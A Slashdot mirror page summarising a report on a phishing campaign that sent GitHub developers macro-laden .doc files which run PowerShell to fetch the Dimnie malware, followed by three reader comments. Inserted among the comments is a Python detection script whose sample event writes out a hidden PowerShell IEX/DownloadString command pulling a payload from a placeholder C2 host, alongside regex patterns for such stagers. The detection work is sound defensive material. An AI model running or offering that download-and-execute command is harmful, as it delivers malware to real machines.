Slashdot Mirror


GitHub Repository Owners Targeted By Data-Stealing Malware (threatpost.com)

"Phishing emails zeroing in on developers who own Github repositories were infecting victims with malware capable of stealing data through keyloggers and modules that would snag screenshots," writes ThreatPost. An anonymous reader quotes their report: Researchers at Palo Alto Networks this week said that in mid-January, an unknown number of developers were targeted with emails purporting to be job offers. The attachments instead carried malicious .doc files containing an embedded macro. The macro executed a PowerShell command that would grab malware from a command and control site and execute it... [Senior threat researcher Brandon] Levene said it's unknown how widespread the January campaign was or why developers were targeted, but given the vast number of projects hosted on the platform, it would likely be an attractive target for either criminals or nation-state attackers.
Levene said the PowerShell script drops a binary named Dimnie, which has been around since 2014 but before January targeted primarily Russian-speaking targets. Someone who received two different emails said they appeared to be hand-crafted, according to Ars Technica, and referenced data changed that same day. They believe this suggests "a focused campaign explicitly targeting targets perceived as 'high return investments,' such as developers (possibly working on popular/open source projects)."

3 of 63 comments

  1. Re:Devs by Anonymous Coward · Score: 5, Insightful

    Many trojans were distributed as resume.txt.exe at one point, so you really did have to be afraid of opening ".txt" files, since the Windows default at the time would hide the .exe... unless of course you were one of the people who understood the risk. Is this insane? Well yes... Microsoft should've never hidden the extension by default. The fault is entirely theirs. Just like how the fault is entirely theirs that a .doc file has a built-in control language easily used to contain a malicious payload.

    Simple solution is not to use the programs that execute the malicious code while reading a document, but this falls under 'having to know it' and isn't a good solution for the commons.
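Two defender-side checks for the behaviour described on this page, the macro-to-PowerShell download chain in the summary and the resume.txt.exe double-extension trick in the comment above, as an added Python example that is not part of the Slashdot page or the Palo Alto report; the process-event format, field names and sample events are constructed for illustration.

```python
import re

# Office applications that should not normally spawn a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Command-line fragments typical of a download-and-execute PowerShell stager.
DOWNLOAD_EXEC = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression"
    r"|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass)", re.I)
# Extensions Windows runs on double-click; a decoy document extension in front of one is
# the resume.txt.exe pattern from the comment.
EXEC_EXT = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "vbs", "hta"}
DECOY_EXT = {"txt", "doc", "docx", "pdf", "jpg", "png", "xls", "ppt"}
# Constructed event format: key=value fields joined by '|'; CommandLine is allowed to
# contain '|' because the lookahead only splits before the next key=.
FIELD = re.compile(r"(\w+)=(.*?)(?=\|\w+=|$)", re.S)

def parse_event(line):
    """Turn one constructed process-creation line into a dict of fields."""
    return dict(FIELD.findall(line.strip()))

def classify_event(line):
    """Return the findings for one event; an empty list means nothing suspicious."""
    ev = parse_event(line)
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    child = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    findings = []
    if parent in OFFICE_PARENTS and child in INTERPRETERS:
        findings.append("office-spawned-interpreter")
    if child in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_EXEC.search(ev.get("CommandLine", "")):
        findings.append("powershell-download-exec")
    return findings

def suspicious_attachment_name(name):
    """True for names like resume.txt.exe: a decoy extension hiding an executable one."""
    parts = name.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[1] in DECOY_EXT and parts[2] in EXEC_EXT

# Constructed sample events, not real telemetry; the host name is a placeholder.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Program Files\Microsoft Office\WINWORD.EXE"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell -w hidden -nop IEX (New-Object Net.WebClient)"
    r".DownloadString('http://c2.example.invalid/a')",
    r"ParentImage=C:\Windows\explorer.exe"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell Get-ChildItem",
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        print(classify_event(line))
    print(suspicious_attachment_name("resume.txt.exe"))
```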

  2. Re:Devs by fuzzyfuzzyfungus · Score: 4, Insightful

    Because one aspect of the 'more structured' is a handy mechanism for executing code on your system if you open it. If text editors habitually executed any shell scripts included in .txt files, we'd be nervous about those as well. Greater complexity is hardly completely safe, since it makes implementation of software capable of opening the file more complex; but that's a comparatively minor difference of degree compared to the difference between file types where automatic execution is a feature and ones where it's a bug.

  3. Re:Devs by Anonymous Coward · Score: 2, Insightful

    As a general rule: I don't open stuff from email, regardless of who sent it.

    Yes, that's because you don't have a job.

    Those of us with actual paying jobs don't have the luxury of not opening e-mail attachments.